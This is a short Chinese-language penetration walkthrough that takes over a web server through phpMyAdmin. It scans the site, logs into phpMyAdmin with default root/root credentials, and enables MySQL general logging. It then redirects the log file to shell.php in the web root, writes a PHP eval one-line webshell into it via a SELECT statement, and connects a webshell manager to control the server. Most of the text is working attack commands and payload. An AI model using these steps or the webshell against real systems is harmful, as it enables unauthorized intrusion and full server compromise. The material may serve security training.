web站点渗透
合理选择攻击机中的工具对目标Web进行扫描,收集信息,了解web服务器类型,查看是否有可疑端口、地址或文件。
这里选择的是御剑,用来分析目标地址有哪些网站。
其中发现了phpmyadmin网页地址,打开以后。
通过使用账号root,密码root成功进入后台
以root权限登录网站数据库后,尝试利用日志文件来进行 getshell。首先在 sql 处执行“SHOW VARIABLES LIKE 'general%'”查看是否开启日志功能以及日志文件的保存路径。
如日志功能暂未开启。可以执行“set global general_log = "ON";”开启 mysql 日志功能,再次确认日志功能是否开启。
之后执行 sql 语句“select ‘<?php @eval($_POST[1]);?>’”,向日志文件中写入 php 一句话木马。
但由于在linux中mysql数据库的日志与web目录的用户权限是分开的,我们此时还无法通过目录地址访问该日志文件。
修改日志文件存储路径和文件名的语句为“set global general_log_file=' 绝对路径';”。
寻找网站在服务器上的绝对地址(浏览可能包含该信息的文件)。
通过上面的御剑扫描结果可以发现,有一个网址比较可疑,info.php
执行:“set global general_log_file=' C://xxx//xxx//xxx//shell.php';”将日志文件的存储路径改为站点根目录下的 shell.php 文件。
重新写入php一句话木马。
之后在浏览器中访问shell.php,查看是否能够访问成功。
使用webshell管理工具连接创建的shell.php文件,控制服务器。